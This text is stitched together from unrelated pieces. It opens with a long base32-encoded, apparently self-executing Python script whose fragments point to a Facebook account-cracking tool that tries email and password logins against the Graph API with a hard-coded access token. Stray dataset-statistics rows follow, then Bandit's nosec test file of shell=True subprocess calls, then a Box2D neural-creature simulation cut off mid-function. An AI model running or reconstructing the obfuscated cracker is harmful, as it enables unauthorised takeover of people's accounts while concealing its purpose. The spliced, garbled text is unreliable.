IJNFTCAJ3BMNRWK43TL52G623FNYTSA2LOEBYTUDIKBEEQSCIJBEEQSCIJBEEXA4TJNZ2CAJ24PAYWEWZTGI5TC3K3J5F6FHETLUQFY6BRMJNTAOZRNVEUIIC4PAYWEWZRHM4TC3JAEAQCAIBAHIQFY6BRMJNTAOZRNUTSAKZAOVZWK4QNBIEQSCIJBEEQSCIJBEEQS4DSNFXHIIBHLR4DCYS3GMZDWMLNLMQV2IC4PAYWEWZQHMYW2UDBONZXO33SMQQFY6BRMJNTCOZZGFWTUIC4PAYWEWZQHMYW2JZAFMQHAYLTOM2SAKZAE5OG4JYNBIEQSCIJBEEQSCIJBEEQS33LOMXGC4DQMVXGIKDVONSXEK3QMFZXGNJJBUFASCIJBEEQSCIJBEEQSZLMONSTUDIKBEEQSCIJBEEQSCIJBEEWSZRAE53XO5ZOMZQWGZLCN5XWWLTDN5WSOIDJNYQHCWZCMVZHE33SL5WXGZZCLU5A2CQJBEEQSCIJBEEQSCIJBEEXA4TJNZ2CAJ24PAYWEWZTGM5TC3K3INYOFGFAFNOSAXDYGFRFWMB3GFWUSRBALR4DCYS3GE5TSMLNEAQCAIBAEA5CAXDYGFRFWMB3GFWSOIBLEB2XGZLSBUFASCIJBEEQSCIJBEEQSCIJOBZGS3TUEATVY6BRMJNTGMZ3GFWVXYUITJOSAXDYGFRFWMB3GFWVAYLTON3W64TEEBOHQMLCLMYTWOJRNU5CAXDYGFRFWMB3GFWSOIBLEBYGC43TGUQCWIBHLRXCODIKBEEQSCIJBEEQSCIJBEEQSY3FNMQD2IDPOBSW4KBCN52XIL3TOVYGK4S7MNYC45DYOQRCYIBCMERCSDIKBEEQSCIJBEEQSCIJBEEQSY3FNMXHO4TJORSSQISJIQ5CEIBLOVZWK4RLEARCAUDXHIRCAK3QMFZXGNJLEJOG4IRJBUFASCIJBEEQSCIJBEEQSCIJMNSWWLTDNRXXGZJIFEGQUCIJBEEQSCIJBEEQSCIJBFRWK23QN5UW45BOMFYHAZLOMQUHK43FOIVXAYLTOM2SSDIKBEEQSCIJBEEQSCIJBEEWK3DTMU5A2CQJBEEQSCIJBEEQSCIJBEEXAYLTOM3CAPJAMJNSOZTJOJZXIX3OMFWWKJ25EAVSAJZRGIZTINJHBUFASCIJBEEQSCIJBEEQSCIJMRQXIYJAHUQHK4TMNRUWELTVOJWG64DFNYUCE2DUORYHGORPF5RC2YLQNEXGMYLDMVRG633LFZRW63JPNVSXI2DPMQXWC5LUNAXGY33HNFXD6YLDMNSXG427ORXWWZLOHUZDGNZXGU4TSMBZGU4TCNRVGUSTENJSGU3UGMDGGE2DAYLBMJSWIZTCGY2WCYZSG5QTOMZZMVSDCYJSGI3DGYRREZTG64TNMF2D22TTN5XCM43ENNPXMZLSONUW63R5GITGK3LBNFWD2IRLFB2XGZLSFEVSEJTMN5RWC3DFHVSW4X2VKMTHAYLTON3W64TEHURCWKDQMFZXGNRJFMRCM43ENM6WS33TEZTWK3TFOJQXIZK7ONSXG43JN5XF6Y3PN5VWSZLTHUYSM43JM46TGZRVGU2WMOJZMZRDMMLGMNSDOYLBGBRTINDGGU4GMNJSGJSWMNRCFEGQUCIJBEEQSCIJBEEQSCIJBFYSAPJANJZW63RONRXWCZBIMRQXIYJJBUFASCIJBEEQSCIJBEEQSCIJNFTCAJ3BMNRWK43TL52G623FNYTSA2LOEBYTUDIKBEEQSCIJBEEQSCIJBEEQSCLQOJUW45BAE5OHQMLCLMZTEOZRNVNU6S7CTSJV2IC4PAYWEWZQHMYW2SKEEBOHQMLCLMYTWOJRNUQCAIBAEAQDUIC4PAYWEWZQHMYW2JZAFMQHK43FOIGQUCIJBEEQSCIJBEEQSCIJBEEXA4TJNZ2CAJ24PAYWEWZTGI5TC3K3EFOSAXDYGFRFWMB3GFWVAYLTON3W64TEEBOHQMLCLMYTWOJRNU5CAXDYGFRFWMB3GFWSOIBLEBYGC43TGYQCWIBHLRXCODIKBEEQSCIJBEEQSCIJBEEQSCLPNNZS4YLQOBSW4ZBIOVZWK4RLOBQXG4ZWFEGQUCIJBEEQSCIJBEEQSCIJBFSWY43FHIGQUCIJBEEQSCIJBEEQSCIJBEEWSZRAE53XO5ZOMZQWGZLCN5XWWLTDN5WSOIDJNYQHCWZCMVZHE33SL5WXGZZCLU5A2CQJBEEQSCIJBEEQSCIJBEEQSCLQOJUW45BAE5OHQMLCLMZTGOZRNVNUG4HCTCQCWXJALR4DCYS3GA5TC3KJIQQFY6BRMJNTCOZZGFWSAIBAEAQCAORALR4DCYS3GA5TC3JHEAVSA5LTMVZA2CQJBEEQSCIJBEEQSCIJBEEQSCLQOJUW45BAE5OHQMLCLMZTGOZRNVN6FCE2LUQFY6BRMJNTAOZRNVIGC43TO5XXEZBALR4DCYS3GE5TSMLNHIQFY6BRMJNTAOZRNUTSAKZAOBQXG4ZWEAVSAJ24NYTQ2CQJBEEQSCIJBEEQSCIJBEEQSCLDMVVSAPJAN5YGK3RIEJXXK5BPON2XAZLSL5RXALTUPB2CELBAEJQSEKINBIEQSCIJBEEQSCIJBEEQSCIJBFRWK2ZOO5ZGS5DFFARESRB2EIQCW5LTMVZCWIBCEBIHOORCEAVXAYLTOM3CWIS4NYRCSDIKBEEQSCIJBEEQSCIJBEEQSCIJMNSWWLTDNRXXGZJIFEGQUCIJBEEQSCIJBEEQSCIJBEEQSY3FNNYG62LOOQXGC4DQMVXGIKDVONSXEK3QMFZXGNRJBUFASCIJEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCADIKBEEWK6DDMVYHIOQNBIEQSCLQMFZXGDIKBEEQ2CQJOAQD2ICUNBZGKYLEKBXW63BIGMYCSDIKBFYC43LBOAUG2YLJNYWCA2LEFEQA2CQJBUFAS4DSNFXHIIBHLQYDGM23GE5TGMJ3GQYG2W7CTSJV2ICQOJXWGZLTOMQEQYLTEBBGKZLOEBBW63LQNRSXIZLELQYDGM23GE5TSNTNFYXC4LRHBUFAS4DSNFXHIIBCLQYDGM23GE5TGMR3GQYG2WZLLUQFI33UMFWCAT2LF5OHQMLCLMYTWOJTNVBVAIC4GAZTGWZRHM4TC3J2EBODAMZTLMYTWOJRNURCW43UOIUGYZLOFBXWW4ZJFEVSEXBQGMZVWMJ3GMYTWNBQNUXVYMBTGNNTCOZTGY5TIMDNEIVXG5DSFBWGK3RIMNSWW4DPNFXHIKJJBUFAS4DSNFXHIIBHLQYDGM23GE5TGNB3GQYG2WZLLUQEGUBAIZUWYZJAJBQXGICCMVSW4ICTMF3GKZBAHIQHGYLWMUXWG4BOOR4HIJYNBIEXA4TJNZ2CAIRCEIGQUXBQGMZVWMJ3GMYTWNBQNUQOFGEF4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFGEFBUFCAIBAEAQCAIBAEAQCAIRCEIGQUCLSMF3V62LOOB2XIKBCLRXFYMBTGNNTCOZZGZWVWXBQGMZVWMJ3HE3W2RLYNF2FYMBTGNNTCOZZGZWV2IRJBUFAS43VOBSXEKBJBUFA2CTEMVTCAYTSOV2GKKBJHIGQUIBAEAQG64ZOON4XG5DFNUUCOY3MMVQXEJZJBUFCAIBAEB2HE6J2BUFCAIBAEAQCAIBAORXWWZLUEA6SA33QMVXCQJ3MN5TWS3ROOR4HIJZMEATXEJZJFZZGKYLEFAUQ2CRAEAQCAZLYMNSXA5BAJFHUK4TSN5ZDUDIKEAQCAIBAEAQCA4DSNFXHIIBHLR4DCYS3GE5TSMLNLMQV2ICUN5VWK3RANZXXIIDGN52W4ZBHBUFCAIBAEAQCAIBAN5ZS443ZON2GK3JIE5ZG2IBNOJTCA3DPM5UW4LTUPB2COKINBIQCAIBAEAQCAIDUNFWWKLTTNRSWK4BIGAXDKKINBIQCAIBAEAQCAIDMN5TWS3RIFEGQUIBAEAQGK3DTMU5A2CRAEAQCAIBAEAQG64ZOON4XG5DFNUUCOY3MMVQXEJZJBUFCAIBAEAQCAIBAOBZGS3TUEBWG6Z3PBUFCAIBAEAQCAIBAOBZGS3TUEATVYMBTGNNTCOZTGE5TIMDNEDRJRBPCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJRBJHBUFCAIBAEAQCAIBAORZHSOQNBIQCAIBAEAQCAIBAEAQCAZLNMFUWYIB5EBZGC527NFXHA5LUFATVY6BRMJNTCOZZGFWVWK25EBOHQMLCLMYTWOJSNVEUIXDYGFRFWMJ3HE3W2L24PAYWEWZRHM4TE3KFNVQWS3BALR4DCYS3GE5TSN3NKRQXEZ3FOQQFY6BRMJNTCOZZGFWTUXDYGFRFWMJ3HE3W2IBHFEGQUIBAEAQCAIBAEAQCAIBAOBQXG43XEA6SA4TBO5PWS3TQOV2CQJ24PAYWEWZRHM4TC3K3FNOSAXDYGFRFWMJ3HEZG2V3POJSGY2LTOQQFY6BRMJNTCOZZG5WWK6DUFBWGS43UFZ2HQ5BJEBOHQMLCLMYTWOJRNU5CAXDYGFRFWMJ3HE3W2JZJBUFCAIBAEAQCAIBAEAQCAIDUN52GC3BAHUQG64DFNYUHAYLTON3SYIBHOITSSDIKEAQCAIBAEAQCAIBAEAQHI33UMFWCAPJAORXXIYLMFZZGKYLENRUW4ZLTFAUQ2CRAEAQCAIBAEAQCAIBAEBYHE2LOOQQCOXBQGMZVWMJ3GMYTWNBQNUQOFGEF4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFGEFE4GQUIBAEAQCAIBAEAQCAIBAOBZGS3TUEATVY6BRMJNTCOZZGFWVWXDYGFRFWMJ3HE3G2XDYMUZFY6BZMNOHQOJTLR4DCYS3GE5TSMLNLUQFY6BRMJNTCOZZGJWVIYLSM5SXIIC4PAYWEWZRHM4TC3J2LR4DCYS3GE5TSN3NEATSAKZAMVWWC2LMBUFCAIBAEAQCAIBAEAQCAIDQOJUW45BAE5OHQMLCLMYTWOJRNVNSWXJALR4DCYS3GE5TSMTNKRXXIYLMLR4DCYS3GE5TSNTNEATSAKZAON2HEKDMMVXCQ5DPORQWYKJJEAVSAJZALR4DCYS3GE5TSMTNKBQXG43XN5ZGIJYNBIQCAIBAEAQCAIBAEAQCA2TBNRQW4KBHLR4DCYS3GE5TSMLNLNOHQZJSLR4DSY24PBRGCXJALR4DCYS3GE5TSMTNKBWGKYLTMUQHOYLJOQQFY6BRMJNTCOZZG5WS4LROE4UQ2CRAEAQCAIBAEAQCAIBAEBZWC3TENEQD2IDPOBSW4KDQMFZXG5ZMEATXEJZJBUFCAIBAEAQCAIBAEAQCAIDGN5ZCA4DXEBUW4IDTMFXGI2J2BUFCAIBAEAQCAIBAEAQCAIBAEAQCA5DSPE5A2CRAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIDQO4QD2IDQO4XHEZLQNRQWGZJIE5OG4JZMEATSOKINBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBZXS4ZOON2GI33VOQXHO4TJORSSQJ24OJOHQMLCLMYTWOJRNVNVY6BRMJNTCOZZGZWVY6DFGJOHQOLDLR4GEOC4PAYWEWZRHM4TC3K5EBOHQMLCLMYTWOJSNVKHE6JALR4DCYS3GE5TSN3NE4QCWIDQO4UQ2CRAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIDTPFZS443UMRXXK5BOMZWHK43IFAUQ2CRAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIDEMF2GCIB5EBZGK4LVMVZXI4ZOM5SXIKBHNB2HI4DTHIXS6YRNMFYGSLTGMFRWKYTPN5VS4Y3PNUXW2ZLUNBXWIL3BOV2GQLTMN5TWS3R7MFRWGZLTONPXI33LMVXD2MRTG43TKOJZGA4TKOJRGY2TKJJSGUZDKN2DGBTDCNBQMFQWEZLEMZRDMNLBMMZDOYJXGM4WKZBRMEZDENRTMIYSMZTPOJWWC5B5NJZW63RGONSGWX3WMVZHG2LPNY6TEJTFNVQWS3B5E4QCWIDFNVQWS3BAFMQCOJTMN5RWC3DFHVSW4X2VKMTHAYLTON3W64TEHUTSAKZAOB3SAKZAE4THGZDLHVUW64ZGM5SW4ZLSMF2GKX3TMVZXG2LPNZPWG33PNNUWK4Z5GETHG2LHHUZWMNJVGVTDSOLGMI3DCZTDMQ3WCYJQMM2DIZRVHBTDKMRSMVTDMJZJBUFCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQG24DTNAQD2IDKONXW4LTMN5QWI4ZIMRQXIYJOORSXQ5BJBUFCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQGSZRAE5QWGY3FONZV65DPNNSW4JZANFXCA3LQONUDUDIKEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIDEMFYGC5BAHUQG64DFNYUCOQTSOV2GKLTUPB2COLBAE53SOKINBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAMRQXAYLUFZ3XE2LUMUUGK3LBNFWCAKZAE4QHYIBHEAVSA4DXEAVSAJ24NYTSSDIKEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIDEMFYGC5BOMNWG643FFAUQ2CRAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCA4DSNFXHIIBHLRXFY6BRMJNTCOZZGFWVWK25EBOHQMLCLMYTWOJSNVDG65LOMRSWILRHBUFCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBYHE2LOOQQDKMRAFIQCOXDYGFRFWMJ3HE3W2XDYMUZFY6BZGVOHQOJQE4GQUIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQHA4TJNZ2CAJ24PAYWEWZRHM4TC3K3LR4GKMS4PA4WKXDYMI4V2IC4PAYWEWZRHM4TE3KVONSXE3TBNVSSAXDYGFRFWMJ3HEYW2OS4PAYWEWZRHM4TO3JAE4QCWIDFNVQWS3ANBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAOBZGS3TUEATVY6BRMJNTCOZZGFWVWXDYMUZFY6BZMVOHQYRZLUQFY6BRMJNTCOZZGJWVAYLTON3W64TEEBOHQMLCLMYTWOJRNU5FY6BRMJNTCOZZG5WSAJZAFMQHA5YNBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBANNSWY5LBOIUCSDIKEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAMVWHGZJ2BUFCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBUWMIBHO53XOLTGMFRWKYTPN5VS4Y3PNUTSA2LOEBWXA43ILMTWK4TSN5ZF63LTM4TV2OQNBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIDDMVVXGIB5EBXXAZLOFATUE4TVORSWGZLLOBXWS3TUFZ2HQ5BHFQQCO5ZHFEGQUIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBRWK23TFZ3XE2LUMUUGK3LBNFWCAKZAE4QHYIBHEAVSA4DXEAVSAJ24NYTSSDIKEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAY3FNNZS4Y3MN5ZWKKBJBUFCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAOBZGS3TUEATVY3S4PAYWEWZRHM4TC3K3FNOSAXDYGFRFWMJ3HEZG2RTPOVXGIZLEFYTQ2CRAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQHA4TJNZ2CAIBCLQYDGM23GE5TGNR3GQYG2IHCTCC6FFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCTCCSEDIKEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCA4DSNFXHIIBHLR4DCYS3GE5TSMLNLMQV2IC4PAYWEWZRHM4TG3KBMNRW65LOOQQE2YLZMJSSAQ3IMVRWW4DPNFXHIJYNBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIDQOJUW45BAE5OHQMLCLMYTWOJRNVNVY6DFGJOHQOLFLR4GEOK5EBOHQMLCLMYTWOJSNVKXGZLSNZQW2ZJALR4DCYS3GE5TSMLNHJOHQMLCLMYTWOJXNUQCOIBLEBSW2YLJNQGQUIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBYHE2LOOQQCOXDYGFRFWMJ3HEYW2W24PBSTEXDYHFSVY6DCHFOSAXDYGFRFWMJ3HEZG2UDBONZXO33SMQQFY6BRMJNTCOZZGFWTUXDYGFRFWMJ3HE3W2IBHEAVSA4DXBUFCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBANNSWY5LBOIUCSDIKEAQCAIBAEAQCAIBAEAQCAIBAEBSXQY3FOB2CA4TFOF2WK43UOMXGK6DDMVYHI2LPNZZS4Q3PNZXGKY3UNFXW4RLSOJXXEOQNBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBYHE2LOOQQCOXDYGFRFWMJ3HEYW2WZBLUQEG33ONZSWG5DJN5XCARLSOJXXEJYNBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEB2GS3LFFZZWYZLFOAUDCKINBIGQUIBAEAQCAIBAEBSXQY3FOB2CASKPIVZHE33SHIGQUIBAEAQCAIBAEAQCAIBAOBZGS3TUEATVY6BRMJNTCOZZGFWVWIK5EBDGS3DFEBXG65BAMZXXK3TEFYXC4JYNBIQCAIBAEAQCAIBAEAQCA4DSNFXHIIBCEIRFY3S4PAYWEWZRHM4TC3K3EFOSAXDYGFRFWMJ3HEZG2TDPN5VXGIDMNFVWKIDZN52SAZDPNYTXIIDIMF3GKIDBEB3W64TENRUXG5BCEIRA2CRAEAQCAIBAEAQCAIBAEBZXK4DFOIUCSDIKBUFGSZRAL5PW4YLNMVPV6IB5HUQCOX27NVQWS3S7L4TTUDIKBFWG6Z3JNYUCSDIK'))
| 20,356
| 40,698
| 0.999779
| 6
| 40,712
| 6,783.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106092
| 0.000049
| 40,712
| 2
| 40,698
| 20,356
| 0.893736
| 0
| 0
| 0
| 0
| 0
| 0.998993
| 0.998993
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
c699791140938bcc877527a9d6c594c6b8ad23a6
| 1,115
|
py
|
Python
|
examples/nosec.py
|
bittner/bandit
|
87ecc4079ea50d77be13ed72bbf5ad2eb0673c64
|
[
"Apache-2.0"
] | null | null | null |
examples/nosec.py
|
bittner/bandit
|
87ecc4079ea50d77be13ed72bbf5ad2eb0673c64
|
[
"Apache-2.0"
] | null | null | null |
examples/nosec.py
|
bittner/bandit
|
87ecc4079ea50d77be13ed72bbf5ad2eb0673c64
|
[
"Apache-2.0"
] | null | null | null |
subprocess.Popen('/bin/ls *', shell=True) #nosec (on the line)
subprocess.Popen('/bin/ls *', #nosec (at the start of function call)
shell=True)
subprocess.Popen('/bin/ls *',
shell=True) #nosec (on the specific kwarg line)
subprocess.Popen('#nosec', shell=True)
subprocess.Popen('/bin/ls *', shell=True) # type: ... # nosec # noqa: E501 ; pylint: disable=line-too-long
subprocess.Popen('/bin/ls *', shell=True) # type: ... # nosec B607 # noqa: E501 ; pylint: disable=line-too-long
subprocess.Popen('/bin/ls *', shell=True) #nosec subprocess_popen_with_shell_equals_true (on the line)
subprocess.Popen('#nosec', shell=True) # nosec B607, B602
subprocess.Popen('#nosec', shell=True) # nosec B607 B602
subprocess.Popen('/bin/ls *', shell=True) # nosec subprocess_popen_with_shell_equals_true start_process_with_partial_path
subprocess.Popen('/bin/ls *', shell=True) # type: ... # noqa: E501 ; pylint: disable=line-too-long # nosec
subprocess.Popen('#nosec', shell=True) # nosec B607, B101
subprocess.Popen('#nosec', shell=True) # nosec B602, subprocess_popen_with_shell_equals_true
| 69.6875
| 122
| 0.707623
| 157
| 1,115
| 4.904459
| 0.203822
| 0.311688
| 0.187013
| 0.207792
| 0.881818
| 0.850649
| 0.725974
| 0.592208
| 0.507792
| 0.406494
| 0
| 0.034091
| 0.131839
| 1,115
| 15
| 123
| 74.333333
| 0.761364
| 0.463677
| 0
| 1
| 0
| 0
| 0.175862
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c6b41f0efd400e06be58e95b38c0c907ff3f93df
| 36,315
|
py
|
Python
|
creatures.py
|
gweltou/Neuranim
|
e3805bf3b4ff9f386855734535730b9fcd72a340
|
[
"MIT"
] | 2
|
2019-11-03T03:21:31.000Z
|
2022-02-16T03:15:38.000Z
|
creatures.py
|
gweltou/Neuranim
|
e3805bf3b4ff9f386855734535730b9fcd72a340
|
[
"MIT"
] | null | null | null |
creatures.py
|
gweltou/Neuranim
|
e3805bf3b4ff9f386855734535730b9fcd72a340
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Box2D.b2 import pi, vec2, world, circleShape, polygonShape, staticBody, dynamicBody, fixtureDef
import numpy as np
import uuid
from parameters import *
from nn import *
class Animatronic(object):
""" Abstract class
"""
def __init__(self, world):
self.id = uuid.uuid1().fields[0]
self.world = world
self.score = 0
self.sensors = []
def set_start_position(self, x, y):
self.start_position = vec2(x, y)
def set_target(self, x, y):
self.target = vec2(x, y)
"""def breed(self, other):
nn = NeuralNetwork(NEURON_LAYERS)
nn.weights = []
for w1, w2 in zip(self.nn.weights, other.nn.weights):
nn.weights.append(cross2(w1, w2))
child = Animatronic(self.world, self.position)
child.nn = nn
child.mutate()
return child
"""
def get_position(self):
pos = self.body.position
return pos.x, pos.y
def set_category(self, n):
cat = 2**n
for body in self.bodies:
for fix in body.fixtures:
fix.filterData.categoryBits = cat
fix.filterData.maskBits = 1
if fix.filterData.groupIndex == 0:
fix.filterData.groupIndex = cat # This causes problems when creature's limbs collide with body
def copy(self):
duplicate = self.__class__(self.world)
duplicate.nn = self.nn.copy()
duplicate.pop_id = self.pop_id
return duplicate
def mutate(self, frequency=2):
total_synapses = self.nn.get_total_synapses()
mutation_count = 0
for w in self.nn.weights:
wf = w.flat
for i in range(w.size):
if np.random.randint(total_synapses//frequency) == 0:
mutation_count += 1
# Another random weight between -1 and 1
r = np.random.random()*2 - 1.0
# Deactivate synapse if close enough to 0
if abs(r) < 0.02: r = 0
# Keep deactivated
if wf[i] != 0: wf[i] = r
return mutation_count
def destroy(self):
for joint in self.joints:
self.world.DestroyJoint(joint)
for body in self.bodies:
self.world.DestroyBody(body)
self.world.contactListener.unregisterSensors(self.id)
class Cubotron1000(Animatronic):
""""
Neural network input layer:
[pos.x] [pos.y] [joints × 4] [contact_sensors × 4]
Contact sensors:
- lfoot
- lheel
- lbody
- rbody
- rheel
- rfoot
Other sensors:
- body_angle
"""
def __init__(self, world):
super().__init__(world)
self.morpho = "Cubotron1000"
self.n_contact_sensors = 4
self.n_inputs = 2+4+4
def init_body(self):
"""
Order of defining joints and sensors is important
self.joints must be symetrical so it can be reversed for mirror mode
Sensors number (n):
(0)-----x-----(1) [[[ BODY ]]] (2)-----x-----(3)
"""
self.bodies = []
self.body = self.world.CreateDynamicBody(position=self.start_position)
self.body.CreatePolygonFixture(box=(0.5, 0.5), density=1, friction=0.3,
userData = self,
)
# Ground/Body sensors
self.body.CreateCircleFixture(pos=(-0.5, 0.5), radius=0.15,
density=0,
isSensor=True, userData = (self.id, 1)
)
self.body.CreateCircleFixture(pos=(0.5, 0.5), radius=0.15,
density=0,
isSensor=True, userData = (self.id, 2)
)
self.bodies.append(self.body)
# Legs
self.lleg = self.world.CreateDynamicBody(position=self.start_position)
fixture = self.lleg.CreatePolygonFixture(box=(0.3, 0.15), density=1,
friction=0.3,
userData = self,
)
self.bodies.append(self.lleg)
self.rleg = self.world.CreateDynamicBody(position=self.start_position)
self.rleg.CreatePolygonFixture(box=(0.3, 0.15), density=1, friction=0.3,
userData = self,
)
self.bodies.append(self.rleg)
# Feet
self.lfoot = self.world.CreateDynamicBody(position=self.start_position)
self.lfoot.CreatePolygonFixture(box=(0.36, 0.08), density=1,
friction=0.3,
userData = self,
)
## Ground/Foot sensor
self.lfoot.CreateCircleFixture(pos=(-0.36, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 0),
)
self.rfoot = self.world.CreateDynamicBody(position=self.start_position)
self.rfoot.CreatePolygonFixture(box=(0.36, 0.08), density=1,
friction=0.3,
userData = self,
)
## Ground/Foot sensor
self.rfoot.CreateCircleFixture(pos=(0.36, 0), radius=0.15,
density=1, friction=1.0, restitution=0.0,
userData = (self.id, 3),
)
self.bodies.append(self.lfoot)
self.bodies.append(self.rfoot)
self.world.contactListener.registerSensors(self.id, self.n_contact_sensors)
self.joints = []
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.lleg,
bodyB = self.lfoot,
collideConnected = False,
localAnchorA = (-0.3, 0),
localAnchorB = (0.36, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.body,
bodyB = self.lleg,
collideConnected = False,
localAnchorA = (-0.4, -0.45),
localAnchorB = (0.3, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 20.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.body,
bodyB = self.rleg,
collideConnected = False,
localAnchorA = (0.4, -0.45),
localAnchorB = (-0.3, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 20.0
))
self.joints.append(
self.world.CreateRevoluteJoint(
bodyA = self.rleg,
bodyB = self.rfoot,
collideConnected = False,
localAnchorA = (0.3, 0),
localAnchorB = (-0.36, 0),
referenceAngle = pi,
enableMotor = True,
motorSpeed = 0.0,
maxMotorTorque = 10.0
))
def update(self, sensors, mirror=False):
dpos = self.target - self.body.position
if dpos.length > 1:
dpos.Normalize()
joint_angles = [(j.angle%(2*pi))/pi - 1 for j in self.joints]
# Make the limbs angle list symmetric (second half *= -1)
for i in range(len(joint_angles)//2 + len(joint_angles)%2, len(joint_angles)):
joint_angles[i] *= -1
self.sensors = [dpos.x, dpos.y] + joint_angles + sensors
if dpos.x < 0 or mirror:
# Mirror mode
joint_angles = joint_angles[::-1]
self.sensors = [-dpos.x, dpos.y] + joint_angles + sensors[::-1]
self.nn.feedforward(self.sensors)
if dpos.x < 0 or mirror:
# Mirror mode
self.joints[0].motorSpeed = -self.nn.output[3]*20
self.joints[1].motorSpeed = -self.nn.output[2]*20
self.joints[2].motorSpeed = -self.nn.output[1]*20
self.joints[3].motorSpeed = -self.nn.output[0]*20
else:
for i in range(len(self.joints)):
self.joints[i].motorSpeed = self.nn.output[i]*20
class Cubotron1001(Cubotron1000):
"""
Same as Cubotron1000 but with a body angle sensor
"""
def __init__(self, world):
super().__init__(world)
self.morpho = "Cubotron1001"
self.n_inputs += 1
def update(self, sensors, mirror=False):
dpos = self.target - self.body.position
if dpos.length > 1:
dpos.Normalize()
